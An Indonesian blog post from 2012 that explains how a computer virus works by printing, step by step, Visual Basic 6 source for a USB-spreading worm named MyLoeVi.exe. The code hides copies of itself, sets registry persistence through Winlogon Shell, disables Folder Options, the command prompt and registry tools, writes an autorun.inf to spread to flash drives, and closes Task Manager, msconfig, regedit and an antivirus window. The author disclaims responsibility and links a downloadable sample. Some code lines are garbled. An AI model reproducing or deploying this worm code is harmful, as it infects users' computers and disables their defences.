Rabu, 12 Desember 2012

CARA KERJA VIRUS KOMPUTER



Pada artikel kali ini saya akan membahas sedikit tentang bagaimana cara kerja virus secra umum. Virus adalah program yang  dibuat oleh programer untuk tujuan merusak atau mengacaukan system komputer. Bagaimanakah sistem kerja Virus itu sendiri???
Langsung aja kita bahas cara kerjanya. Disini saya menggunakan sampel virus yang menggunakan bahasa pemrograman visual basic 6.0.


1.      Yang pertama virus itu sendiri akan memperbanyak dirinya dalam komputer kita. Misalnya ke folder my document, windows dll serta membuat dirinya tidak tampak yaitu dengan mngubah propertiesnya menjadi hidden.

Set RegRun = CreateObject("WScript.Shell")
FolderMyDocuments = RegRun.specialfolders("MyDocuments")
FolderWindows = RegRun.specialfolder("Windows")

'membuat virus dengan nama hay.exe yamg berada di folder My cocument
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderMyDocuments & "\MyLoeVi.exe"
SetAttr FolderMyDocuments & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly

'membuat virus dengan nama MyLoeVi.exe yang berada di folder Windows
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderWindows & "\MyLoeVi.Exe"
SetAttr FolderWindows & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly

2.      Memodifikasi regestri. Ini bertujuan agar si Virus itu sendiri bisa selalu aktif/running saat windows dijalankan serta memberi keamanan bagi dirinya dengan menonaktifkan fitur-fitur yang bisa mendeteksi keberadaannya.

'virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderMyDocuments &
"\MyLoeVi.exe"""

‘Virus pada Folder Windows akanberjalan secara otomatis saat komputer running.
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderWindows & "\MyLoeVi.exe"""

'Folder Options tak terlihat
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions", 1, "REG_DWORD"

‘Mencegah eksekusi Command Prompt
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1,
"REG_DWORD" 'Disable CMD dan File .Bat

'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools", 1, "REG_DWORD" berekstensi Reg

3.      Menggandakan dirinya ke FlasDisk saat Flasdisk terkoneksi ke komputer.

'mengecek ada atau tdknya MyLoeVi.exe di flashdisk jika tdk ada kemudian
If Dir(FlashDisk & "\MyLoeVi.exe") <> "MyLoeVi.exe" Then
FileCopy FolderStartUp & "\MyLoeVi.exe", FlashDisk & "\MyLoeVi.exe"
SetAttr FlashDisk & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
End If

4.      Membuat autorun.inf di dalam Flasdisk agar virus bisa menyebar ke komputer lain.

‘membuat autorun.inf
Open FlashDisk & "\Autorun.Inf" For Output As 1
Print #1, "[AutoRun]"
Print #1, "ACtIon=Open folder to view files"
Print #1, "Icon=MyLoeVi.exe"
Print #1, "Open=MyLoeVi.exe"
Print #1, "ShellExecute=MyLoeVi.exe"
Print #1, "Shell\Open\Command=MyLoeVi.exe"
Print #1, "sheLl\oPen\DefAulT=1"
Print #1, "shELl\opeN\cOmManD= MyLoeVi.exe"
Print #1, "Shell=Open"
Print #1, "shell\ExplorE\COMmANd=MyLoeVi.exe"
Print #1, "uSEAuToPLaY = 1"
Print #1, "SHell\autopLAy\commAND=MyLoeVi.exe"
Close #1
SetAttr FlashDisk & "\Autorun.Inf", vbHidden + vbSystem + vbReadOnly
End Sub

5.      Menutup aplikasi yang berbahaya bagi virus itu sendiri

‘menutup jendela RUN
FWnd = FindWindow("#32770", "RUN")

‘menutup msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "System Configuration Utility") 'msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&

'menutup task manager
FWnd = FindWindow("#32770", "Windows Task Manager")
SendMessage FWnd, WM_CLOSE, 0&, 0&

'Avira Antivir
FWnd = FindWindow("#32770", "Avira AntiVir Personal - Free Antivirus")
SendMessage FWnd, WM_CLOSE, 0&, 0&

'menutup jendela regedit
FWnd = FindWindow("RegEdit_RegEdit", vbNullString) SendMessage FWnd, WM_CLOSE, 0&, 0&

Demikianlah beberapa cara kerja virus dalam menginfeksi serta mempertahankan dirinya di dalam system.
Ini hanya pembelajaran saja, bukan untuk kegiatan yang merugikan, jika ada kerugian dalam pembelajaran ini, penulis tidak bertanggung jawab.
Penulis juga menyertakan contoh file Virus yang dibahas di atas yang dibuat dengan bahasa pemrograman Visual Basic 6.0. itu modifikasi penulis sendiri loh.......yang di dapat dari berbagai artikel pendukung.

Semoga ini bermanfaat dalam menghindari serta untuk embelajaran dalam membongkar pertahanan virus.

Sampel bisa di download disini


Oleh: LoE BoYtE Waktu 21.09

0 komentar:

Posting Komentar

CopyRyght@2012 | Facebook | Twitte | Bloger | Google